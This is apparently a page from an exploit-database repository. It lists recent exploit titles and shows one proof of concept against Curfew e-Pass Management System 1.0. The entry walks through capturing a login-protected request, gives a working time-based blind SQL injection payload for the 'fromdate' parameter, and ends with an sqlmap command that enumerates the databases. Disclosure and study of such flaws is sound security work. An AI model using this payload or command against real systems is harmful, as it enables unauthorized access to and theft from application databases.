0c65b881ba
10 changes to exploits/shellcodes/ghdb Milesight Routers UR5X_ UR32L_ UR32_ UR35_ UR41 - Credential Leakage Through Unprotected System Logs and Weak Password Encryption WhatsUp Gold 2022 (22.1.0 Build 39) - XSS Clinic's Patient Management System 1.0 - Unauthenticated RCE Curfew e-Pass Management System 1.0 - FromDate SQL Injection GYM MS - GYM Management System - Cross Site Scripting (Stored) MISP 2.4.171 - Stored XSS TASKHUB-2.8.8 - XSS-Reflected Wordpress 'simple urls' Plugin < 115 - XSS
20 lines
No EOL
793 B
Text
20 lines
No EOL
793 B
Text
# Exploit Title: Curfew e-Pass Management System 1.0 - FromDate SQL
|
|
Injection
|
|
# Date: 28/9/2023
|
|
# Exploit Author: Puja Dey
|
|
# Vendor Homepage: https://phpgurukul.com
|
|
# Software Link:
|
|
https://phpgurukul.com/curfew-e-pass-management-system-using-php-and-mysql/
|
|
# Version: 1.0
|
|
# Tested on: Windows 10/Wamp
|
|
|
|
1) login into the application
|
|
2) click on report on pass and capture the request in burpsuite
|
|
3) Parameter "FromDate" is vulnerable to SQL Injection
|
|
Parameter: #1* ((custom) POST)
|
|
Type: time-based blind
|
|
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
|
|
Payload: fromdate=' AND (SELECT 6290 FROM (SELECT(SLEEP(5)))Kdfl) AND
|
|
'SOzQ'='SOzQ&todate=&submit=
|
|
4) Put '*' in the value for the parameter and save the item as cpme
|
|
5) Run sqlmap -r cpme --batch --dbs --random-agent |